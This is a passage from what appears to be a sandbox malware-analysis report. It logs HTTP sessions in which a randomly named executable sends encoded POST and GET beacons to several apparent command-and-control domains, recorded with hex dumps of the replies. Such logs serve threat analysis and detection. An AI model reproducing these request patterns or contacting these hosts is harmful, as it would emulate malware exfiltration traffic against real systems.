                                                    Data Ascii: CviT=tg9D6RRhq9MTylskyMYDrdGcyMPrnMDPQAHm/pwhI2DXTSZN9FPrl+vTzpOvJQfIcIrR8lGDE7UgjSXM40u2i1CAefmy8s/pKLSHnBM4QDYWsNIuMsuojf+LmKIt/bt0DZoftlvKcRifochz0o25UGSRoj/QnoaImiz3RknTLIr/70Hzuk6bWSGaDoC5jCPBkAOnJQi6zPUZ3eOVlPZSGBB8NrPlkYsQXQ==
                                                    Jan 13, 2025 09:34:55.999488115 CET1236INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:34:55 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uEg6bJs24FeUKbn5b7tRjZ7zFMqVEmQN90RQuuBz2mcvn9pYi0iOORnh7jhDvJCS4TU4bT36Awk7kHDeo5S6OU%2BBOVfvJ8xcZeoVzz93Tnhj3D7ypZmxzplCgffOZRpzqTPDo3o8sy4%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140cc79d5b41f3-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                    Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQfRp
                                                    Jan 13, 2025 09:34:55.999533892 CET371INData Raw: 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 b1 03 41 58 e1 9a 62 be
                                                    Data Ascii: >6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<PhtDN:


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.649994188.114.96.3806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:58.471421957 CET1824OUTPOST /pgw3/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.einpisalpace.shop
                                                    Origin: http://www.einpisalpace.shop
                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 74 67 39 44 36 52 52 68 71 39 4d 54 79 6c 73 6b 79 4d 59 44 72 64 47 63 79 4d 50 72 6e 4d 44 50 51 41 48 6d 2f 70 77 68 49 32 4c 58 53 6b 4e 4e 38 6d 58 72 2f 2b 76 54 77 70 4f 69 4a 51 66 56 63 49 43 57 38 6c 4b 31 45 39 51 67 69 7a 33 4d 36 47 47 32 73 31 43 41 57 2f 6d 7a 68 63 2f 34 4b 4c 69 44 6e 42 63 34 51 44 59 57 73 4f 51 75 61 74 75 6f 6c 66 2b 4d 73 71 49 62 30 37 74 51 44 5a 77 50 74 6c 37 61 41 31 75 66 72 38 78 7a 35 2b 71 35 4a 57 53 54 72 6a 2f 32 6e 6f 57 54 6d 69 75 49 52 6b 36 62 4c 50 6a 2f 33 46 66 75 79 48 57 6a 4c 68 6d 6f 56 72 32 4c 74 44 76 6b 38 42 6d 4a 4d 79 6e 49 2b 38 63 47 35 34 6d 59 67 76 59 77 4d 33 31 58 49 4f 32 73 74 73 39 69 4c 53 53 4a 49 49 6e 50 6c 67 37 74 37 6a 4a 39 4b 61 68 70 48 51 62 69 6a 41 70 2f 67 73 6c 4f 50 53 62 6c 42 75 31 70 62 2b 30 42 6b 49 6d 79 30 4c 79 5a 55 39 44 41 49 53 36 77 50 64 70 34 53 68 30 79 63 61 4b 50 52 72 37 71 45 50 35 53 58 75 4c 39 68 47 51 38 55 7a 36 4b 44 31 42 74 4b 70 36 69 61 77 59 46 76 41 75 36 73 [TRUNCATED]
                                                    Data Ascii: CviT=tg9D6RRhq9MTylskyMYDrdGcyMPrnMDPQAHm/pwhI2LXSkNN8mXr/+vTwpOiJQfVcICW8lK1E9Qgiz3M6GG2s1CAW/mzhc/4KLiDnBc4QDYWsOQuatuolf+MsqIb07tQDZwPtl7aA1ufr8xz5+q5JWSTrj/2noWTmiuIRk6bLPj/3FfuyHWjLhmoVr2LtDvk8BmJMynI+8cG54mYgvYwM31XIO2sts9iLSSJIInPlg7t7jJ9KahpHQbijAp/gslOPSblBu1pb+0BkImy0LyZU9DAIS6wPdp4Sh0ycaKPRr7qEP5SXuL9hGQ8Uz6KD1BtKp6iawYFvAu6sD1tar9LP1sm81BSRflIBS5+m4sHavV68zjimxI/tjuGkIsAB7Bfn4WeXPoy1OlqHp22sOeMzGhqhQwIiTgsZVxAXbloHSFr0QhVDrk0hfWe9QgvNxRT8I4uYb9ntaGV6Yp0T871PwIj2AyysyKwfu6gdyDU6mi0O0dW5wgemK5qa6AOkUyngXHWL+gVvnAE3VCDaS0aF+oTDmiXmjLKKegLS82pDQJE8w2M8FAzQDauGL4R4w4Y9ScI3smGG0aCsfJeE7/u3wRa/oshugZnlIAA7hrGnxBDAkqP54tMUsLacz92Bcykw7JEJsp1nIYnT70wUfNZcPPpVqxO2zp1bp0xwEHPeMg/7PnMhrQVSSLnuie4HR1Jk1ic+b8sMnlhM1Ci1pD2LD6ooYqnY7vltqn97lFIPDMBY7QoNGtKFwGW9fm4bOhdvhFfZ0PH2E2G+thcilmCxc8WZr6iIpdE6Ir81+G/rVyZ1waf9WIz56ZuSk5TuF1CBtRlpZhaF5w60S7MQyaZMFrJcKO5oOXaTSjOTbpafL0KSyKYaK3XIOX04fj/Jp3eu++9yyJ/WVfceLaGP6pVpMmqJZhn4KQSkR0b+EFdWnU+QwGxlM8+udAtvYCCzO/LD4voNuvfAajCl+lc2IGjBmMTHQJVuQmjChIdehIScFL4mvr [TRUNCATED]
                                                    Jan 13, 2025 09:34:59.627232075 CET1236INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:34:59 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3M1oF1vOrNdQRcOIOkTYK8qG2pt%2Bv5ePrYws651IVelprKnVaXWqEw6TQPWWYFFWnfHnt97r6FyfPi8%2BfWvgDg5Bho8WL3gGGzoVdHsd05XUjk1Tc4wBO7SJrgTDNAc9lTUbC4XKZQ%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140cddecff8ce0-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1992&rtt_var=996&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1824&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                    Data Ascii: 2cfTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                                                    Jan 13, 2025 09:34:59.627259970 CET379INData Raw: 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 b1 03 41 58 e1
                                                    Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<PhtD


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.649996188.114.96.3806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:01.020791054 CET520OUTGET /pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.einpisalpace.shop
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:35:02.157812119 CET1236INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:02 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Snvxd1puUF9o2Mz0OAQuGkTECCtcN46uuYGC4cbROHn8UIIb6iVPMLI8jOph7xzpmEa%2F2JuptClsjS1dEl%2BbjFmDTnRsKUZMy%2FP5VL7y7t8Y2w6nRn1idTfAUdK6Y613lb8sYwznWBI%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140cedebf9421f-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 35 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                    Data Ascii: 591<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                                                    Jan 13, 2025 09:35:02.157833099 CET1052INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74
                                                    Data Ascii: "> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.64999747.83.1.90806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:07.382155895 CET769OUTPOST /hf4a/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.ripbgs.info
                                                    Origin: http://www.ripbgs.info
                                                    Referer: http://www.ripbgs.info/hf4a/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4d 55 4b 36 6b 49 55 72 6e 72 44 74 31 72 49 67 46 58 67 54 6b 6d 42 76 68 54 50 33 57 6c 2f 34 59 4c 46 31 34 64 78 79 46 59 48 6e 78 48 44 47 70 57 41 74 44 61 44 74 36 45 4e 63 6a 47 4a 46 66 63 45 39 5a 45 46 75 70 5a 78 6c 55 6f 2f 41 36 38 6c 49 70 74 4d 53 34 6d 49 74 48 71 34 46 63 54 38 33 59 6e 72 78 71 67 4a 72 67 6c 64 49 48 31 79 59 70 35 4a 73 78 33 59 46 6d 56 33 7a 41 75 36 49 76 76 65 67 52 47 56 35 5a 4b 58 4c 74 66 61 57 78 46 64 41 47 72 78 2f 69 44 6f 6a 47 34 52 49 2f 6e 4b 75 31 49 51 4d 42 71 4e 37 4e 45 2b 6b 2b 59 31 31 4d 46 50 6e 6b 43 62 65
                                                    Data Ascii: CviT=4zjSVCBXNBiBMUK6kIUrnrDt1rIgFXgTkmBvhTP3Wl/4YLF14dxyFYHnxHDGpWAtDaDt6ENcjGJFfcE9ZEFupZxlUo/A68lIptMS4mItHq4FcT83YnrxqgJrgldIH1yYp5Jsx3YFmV3zAu6IvvegRGV5ZKXLtfaWxFdAGrx/iDojG4RI/nKu1IQMBqN7NE+k+Y11MFPnkCbe


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.64999847.83.1.90806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:09.932131052 CET793OUTPOST /hf4a/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.ripbgs.info
                                                    Origin: http://www.ripbgs.info
                                                    Referer: http://www.ripbgs.info/hf4a/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4e 30 61 36 6d 72 38 72 68 4c 44 75 73 4c 49 67 4c 33 68 61 6b 6d 4e 76 68 58 33 42 56 58 62 34 59 71 31 31 35 63 78 79 45 59 48 6e 70 58 44 44 6e 32 41 69 44 62 2b 59 36 42 4e 63 6a 48 74 46 66 59 49 39 5a 33 74 76 6f 4a 78 6e 59 49 2f 43 6e 73 6c 49 70 74 4d 53 34 6d 63 44 48 71 51 46 63 6a 4d 33 58 6d 72 32 32 77 4a 30 68 6c 64 49 52 31 79 63 70 35 4a 61 78 7a 35 53 6d 58 50 7a 41 72 2b 49 75 39 6d 6a 62 47 56 2f 45 61 57 34 6c 50 62 54 2b 47 6f 73 5a 62 42 6f 7a 69 67 38 4b 75 4d 53 6a 55 4b 4e 6e 59 77 4f 42 6f 56 4a 4e 6b 2b 4f 38 59 4e 31 65 53 44 41 72 32 2b 39 58 70 36 72 71 46 6b 37 66 71 53 50 7a 4b 4d 45 38 48 4f 4f 53 41 3d 3d
                                                    Data Ascii: CviT=4zjSVCBXNBiBN0a6mr8rhLDusLIgL3hakmNvhX3BVXb4Yq115cxyEYHnpXDDn2AiDb+Y6BNcjHtFfYI9Z3tvoJxnYI/CnslIptMS4mcDHqQFcjM3Xmr22wJ0hldIR1ycp5Jaxz5SmXPzAr+Iu9mjbGV/EaW4lPbT+GosZbBozig8KuMSjUKNnYwOBoVJNk+O8YN1eSDAr2+9Xp6rqFk7fqSPzKME8HOOSA==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.64999947.83.1.90806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:12.475527048 CET1806OUTPOST /hf4a/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.ripbgs.info
                                                    Origin: http://www.ripbgs.info
                                                    Referer: http://www.ripbgs.info/hf4a/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4e 30 61 36 6d 72 38 72 68 4c 44 75 73 4c 49 67 4c 33 68 61 6b 6d 4e 76 68 58 33 42 56 58 54 34 59 38 68 31 34 2f 4a 79 48 59 48 6e 33 48 44 43 6e 32 41 46 44 62 6d 63 36 42 78 71 6a 45 46 46 66 37 41 39 4a 47 74 76 6d 35 78 6e 48 34 2f 44 36 38 6b 43 70 70 6f 57 34 6d 4d 44 48 71 51 46 63 6c 41 33 65 58 72 32 30 77 4a 72 67 6c 64 36 48 31 79 6b 70 34 67 76 78 31 6b 76 6e 6e 76 7a 44 4c 4f 49 73 4f 65 6a 5a 6d 56 39 48 61 57 67 6c 50 58 59 2b 47 6b 65 5a 5a 68 43 7a 67 38 38 4a 4b 39 49 6e 32 66 54 7a 2b 59 50 56 36 59 70 4a 7a 6d 39 38 4b 64 6f 54 41 4c 66 74 6b 4f 6d 59 64 7a 6f 71 48 74 65 53 49 6d 63 78 75 78 4d 35 55 69 45 4a 4b 6d 65 50 6b 42 45 32 7a 44 51 46 69 75 34 79 67 58 39 4a 69 34 74 34 6a 64 5a 32 73 65 49 44 4f 2f 65 30 71 54 74 36 48 37 69 68 6d 44 74 78 42 59 72 46 78 37 66 47 54 47 56 2b 6a 67 4a 41 45 74 32 59 64 44 2f 68 37 49 33 47 51 68 63 39 43 32 46 70 6c 72 75 73 66 45 2f 57 39 77 41 49 35 69 4c 30 41 2b 55 57 61 42 59 52 [TRUNCATED]
                                                    Data Ascii: CviT=4zjSVCBXNBiBN0a6mr8rhLDusLIgL3hakmNvhX3BVXT4Y8h14/JyHYHn3HDCn2AFDbmc6BxqjEFFf7A9JGtvm5xnH4/D68kCppoW4mMDHqQFclA3eXr20wJrgld6H1ykp4gvx1kvnnvzDLOIsOejZmV9HaWglPXY+GkeZZhCzg88JK9In2fTz+YPV6YpJzm98KdoTALftkOmYdzoqHteSImcxuxM5UiEJKmePkBE2zDQFiu4ygX9Ji4t4jdZ2seIDO/e0qTt6H7ihmDtxBYrFx7fGTGV+jgJAEt2YdD/h7I3GQhc9C2FplrusfE/W9wAI5iL0A+UWaBYRzWJ+b0Vs/fw4KCw3sOes9SUy+VD6UjbLyMnTzgRES/Jh9UuhfvHfUzk24DYAVDV9I8wzhSXm4nbGupqNHKLxTniWyle1kAcIk71L02iJzMl2bLm7+FDdGm9xYA4iLHX6FXMtsgHQ4xaxWqtkEArpE7FxQcbr/nAJZ7sdlE8bOw3wDc0t1Z98nbhkZKBc1GN02VYYkD2Zhy8tX7iZDnn/YyTWYGihDrdEHZpReUdLW+1UltTCFqrAQGy40gzyesSOlgZt1HZhT5Y4CBhjOIicrscAQOn19TFUn6Z2qcEbJGtqrnwd6HL/mu3xfUGqPVpkiGkXeYFz0OXYPgZyxJ5bDz5nkLLju0X0wnGtKWGYH10vT9ZS3LFicEQtH1ddcD6cGfdxwWktmI4/UkJIywOBi1vA3wEthL5qv0Mv0gBCNIwAFWBuM6in/HDgTXam3J2iKoR7GDvCSw73ZnRp3xVK9Wvg7tBp6pEKX1DzKRswlvrBGJvLabRyC9FKV1STqFpkZB8hIjcn4jg5sx1jQAfn3qbl+rs1zaIHIKh6q8a9jdSh8gfJnhiFi0QLrpUpvRPFvDnUa4BFR2ulbzpA8QfhkCCq6clvewtCDLWvNcqDbeoP5rL+BgR7X/xbFa/Eh6DLuGx+aB7IF+4yoLvnas5QCzBXYSPvrChvNF [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.65000047.83.1.90806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:15.023931026 CET514OUTGET /hf4a/?CviT=1xLyW3NuagjZMWLakpM9q9Dlq5M4Mwlw3Xlkp07XGkfoNpNQ7ONbaOfooFbWkXkUauDqyi9rr3xWBLUVS1AbncpoQpr6kYxUu+wU3Tx1ZPQnZRQ2cE7e7gBiti52HSebvZ5SsDs=&YFCLW=BxgTctSh HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.ripbgs.info
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:35:16.629235029 CET139INHTTP/1.1 567 unknown
                                                    Server: nginx/1.18.0
                                                    Date: Mon, 13 Jan 2025 08:35:16 GMT
                                                    Content-Length: 17
                                                    Connection: close
                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                    Data Ascii: Request too large


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.650002162.0.236.169806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:37.807696104 CET787OUTPOST /t0rn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.explorevision.xyz
                                                    Origin: http://www.explorevision.xyz
